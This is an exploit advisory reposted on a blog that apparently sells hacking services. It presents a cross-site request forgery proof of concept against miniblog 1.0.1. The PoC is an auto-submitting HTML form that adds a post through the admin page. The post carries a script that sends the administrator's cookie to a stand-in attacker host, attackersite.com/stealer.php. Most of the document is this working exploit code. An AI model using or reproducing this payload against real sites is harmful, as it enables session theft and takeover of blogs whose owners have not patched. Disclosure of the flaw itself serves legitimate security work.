Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86394024

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title :              miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
# Author :                     Besim
# Google Dork :                
# Date :                       09/10/2016
# Type :                       webapps
# Platform :                   PHP
# Vendor Homepage :  http://www.spyka.net/scripts/php/miniblog
# Software link :
http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip


Description (admin login required) : 

miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and
edit article in the sections

Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add

Dangerous point : if used with XSS can be steal on the admin's cookie information.


*############### CSRF PoC ###############*


<html> <!-- CSRF PoC --> <body> <form action="
http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E"
method="POST"> <input type="hidden" name="data&#91;post&#95;title&#93;"
value="<script>location&#46;href&#32;&#61;&#32;â&#128;&#152;http&#58;&#47;&#47;www&#46;attackersite&#46;com&#47;stealer&#46;php&#63;cookie&#61;â&#128;&#153;&#43;document&#46;cookie&#59;<&#47;script>"
/> <input type="hidden" name="data&#91;post&#95;content&#93;"
value="tester" /> <input type="hidden" name="data&#91;published&#93;"
value="1" /> <input type="hidden" name="miniblog&#95;PostBack" value="Add"
/> <input type="submit" value="Submit request" /> </form> <script>
document.forms[0].submit(); </script> </body> </html>



########################################